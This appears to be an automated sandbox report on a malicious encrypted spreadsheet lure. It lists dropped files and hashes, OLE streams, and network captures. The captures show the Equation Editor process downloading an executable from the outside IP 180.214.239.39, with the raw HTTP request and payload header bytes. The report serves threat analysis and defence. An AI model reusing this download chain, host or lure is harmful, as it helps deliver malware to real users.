      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBC598EC.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):648132
      Entropy (8bit):2.8123900257305956
      Encrypted:false
      SSDEEP:3072:g34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:a4UcLe0JOcXuunhqcS
      MD5:4CF29B659FB8B82E00439C894D65A51A
      SHA1:D6EA4F336DB59C905741EF8AF9833B2C95C3E5FE
      SHA-256:AF4CD42DCF26F7A86A38E8D8C94D2AD208BBF3E76F7442A9A249D386ED92C8D9
      SHA-512:0F694B1B50606ED190CBC6B240151AA14ED718AF469810732C26CC26E2E4F2EE410F72352B03D9A6364F719E8ACC0BF8A953A1FB580709CA726152ABD316F037
      Malicious:false
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$.......-z.x.@..%...............@........N[P@...8...........$....N[P@...8... ....y.x8...@... .........W..z.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...8...l.........W....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .m.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:false
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):246888
      Entropy (8bit):4.648392883751036
      Encrypted:false
      SSDEEP:1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
      MD5:C937FC9ED4325E6AB24D49A3175F3A5C
      SHA1:00439295920E78ECAC31D1DBF7EB67118D76299A
      SHA-256:D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
      SHA-512:FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 43%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....\S.................0...p......0........@....@.........................................................................t0..(....P...T..........X.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994472821880961
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      File size:1267200
      MD5:b7cdda847140697b7bb7866b06d2a225
      SHA1:874d1157c6e65813383c6b4bffd4d48948993c88
      SHA256:1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
      SHA512:8f4b6dd946571e501968cd8317012923d0ca879e3b8bd6cac782a5498887dbb15ca8ce2132a67d5e85a9d05fd700206892ea2789ba805af7be795a3aa005485c
      SSDEEP:24576:nPaV0dsm4NwrrC+F5BNEggUPmQIE9Nc3HCcbRPJHVYgt0W/uMCrYjxaY5SAF:Pw0Jl3OUbIEsXdbRxbh/aBYh
      File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:False

      Streams

      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
      General
      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
      File Type:data
      Stream Size:64
      Entropy:2.73637206947
      Base64 Encoded:False
      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
      General
      Stream Path:\x6DataSpaces/DataSpaceMap
      File Type:data
      Stream Size:112
      Entropy:2.7597816111
      Base64 Encoded:False
      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
      General
      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
      File Type:data
      Stream Size:200
      Entropy:3.13335930328
      Base64 Encoded:False
      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
      General
      Stream Path:\x6DataSpaces/Version
      File Type:data
      Stream Size:76
      Entropy:2.79079600998
      Base64 Encoded:False
      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1253128
      General
      Stream Path:EncryptedPackage
      File Type:data
      Stream Size:1253128
      Entropy:7.99876914636
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . R . v . . . s x . . . . O . . . . . . . . F . . . > . . . . Z I s . z . . . . . . . Y . ( P . V * . . . . . B . T . 6 . k . ) . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P .
      Data Raw:f8 1e 13 00 00 00 00 00 88 52 18 76 d2 ca a0 73 78 bd a8 80 1c 4f c6 86 b6 da e5 18 a1 ac 46 0a fd ec 3e c9 c5 9e b4 5a 49 73 ae 7a bd 11 aa c2 de 9b d7 59 c9 28 50 15 56 2a 14 da dd 1a a5 42 a0 54 0c 36 d6 6b d7 29 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6
      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
      General
      Stream Path:EncryptionInfo
      File Type:data
      Stream Size:224
      Entropy:4.60634954238
      Base64 Encoded:False
      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . 1 . . . % . . 3 . . i . . 0 . * 2 . P . . ` h 9 . . u . z . . . . . . . . ; . ' | . . . ] ; . . . . . . . . . . ! . . . ( . . . . .
      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 22, 2021 14:03:05.376049995 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:05.622277021 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:05.622356892 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:05.622628927 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:05.870244980 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:05.870277882 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:05.870312929 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:05.870343924 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:05.870420933 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:05.870445013 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.118174076 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118226051 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118263960 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118300915 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118336916 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118356943 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.118376017 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118396997 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.118398905 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.118415117 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118415117 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.118467093 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.118565083 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364136934 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364173889 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364198923 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364218950 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364243984 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364269018 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364294052 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364320040 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364352942 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364382029 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364382982 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364408970 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364423990 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364437103 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364459038 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364464998 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364491940 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364492893 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364520073 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364527941 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364547014 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.364573002 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.364603043 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.368751049 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611433029 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611480951 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611515045 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611545086 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611568928 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611598969 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611629963 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611655951 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611685991 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611721992 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611721039 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611748934 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611752987 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611752987 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611754894 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611757994 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611787081 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611793041 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611815929 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611821890 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611855984 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611860037 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611871958 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611886024 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611916065 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611917019 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611928940 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611947060 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611958981 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.611975908 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.611991882 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612006903 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612018108 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612037897 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612046957 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612072945 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612097025 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612107038 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612126112 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612138033 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612153053 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612168074 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612180948 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612196922 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612226009 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612242937 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612246037 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612253904 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612268925 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612284899 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612298965 CEST4916780192.168.2.22180.214.239.39
      Jul 22, 2021 14:03:06.612318039 CEST8049167180.214.239.39192.168.2.22
      Jul 22, 2021 14:03:06.612344980 CEST4916780192.168.2.22180.214.239.39

      HTTP Request Dependency Graph

      • 180.214.239.39

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167180.214.239.3980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      Jul 22, 2021 14:03:05.622628927 CEST0OUTGET /process/.svchost.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 180.214.239.39
      Connection: Keep-Alive
      Jul 22, 2021 14:03:05.870244980 CEST1INHTTP/1.1 200 OK
      Date: Thu, 22 Jul 2021 11:50:59 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Wed, 21 Jul 2021 22:37:17 GMT
      ETag: "3c468-5c7a9d0090119"
      Accept-Ranges: bytes
      Content-Length: 246888
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPEL\S0p0@@t0(PTX( .text$0 `.data@@@.rsrcTP`P@@IMSVBVM60.DLL


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 2368 Parent PID: 584

      General

      Start time:14:02:56
      Start date:22/07/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13fcf0000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: EQNEDT32.EXE PID: 2124 Parent PID: 584

      General

      Start time:14:03:17
      Start date:22/07/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
